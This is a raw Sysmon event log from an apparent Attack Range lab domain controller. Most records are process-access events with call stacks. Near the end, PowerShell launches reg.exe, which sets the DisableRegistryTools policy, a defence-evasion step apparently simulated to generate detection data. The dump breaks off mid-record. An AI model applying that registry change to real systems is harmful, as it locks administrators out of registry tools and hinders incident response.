12:09:19.739{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.739{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43566964C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43566964C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565468C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565468C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.239{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9402ACC24B0BECF0E67D95DCDC015BA,SHA256=70453D60C709D7A694B0966ABDA9F66B46A89937AE9B119B232F6E3F13BC8A68,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.161{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.161{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.161{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x800000000000000010849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.616{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53710-false10.0.1.12-8000- 23542300x800000000000000010848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:20.254{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=072929EC0C252382E81428444594EDD9,SHA256=663F18E2164C56148F5BF4AE1787F0EE584DD69A70D3194CDA5F12CC1C3A872A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:21.270{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=468AAF27FFC144C78DFCAD909A1C5976,SHA256=DAD85456DA344C586E93467D8AC62422EAD449FF4FE1C8DB73354D26190E9B90,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:22.926{266CAFBE-6672-6064-7201-00000000AE01}724C:\Windows\SysWOW64\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryToolsDWORD (0x00000001) 10341000x800000000000000010859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.895{266CAFBE-65AC-6064-5101-00000000AE01}55606832C:\Windows\system32\conhost.exe{266CAFBE-6672-6064-7201-00000000AE01}724C:\Windows\SysWOW64\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.895{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.895{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.895{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.895{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.895{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6672-6064-7201-00000000AE01}724C:\Windows\SysWOW64\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.895{266CAFBE-65AB-6064-5001-00000000AE01}24562612C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6672-6064-7201-00000000AE01}724C:\Windows\SysWOW64\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+781c0|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+23cc02(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aaaa4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aa39c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5d4219a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537afa3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537aca0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5cb9293(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5344c0d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5394e98(wow64)|C:\Windows\assembly\NativeI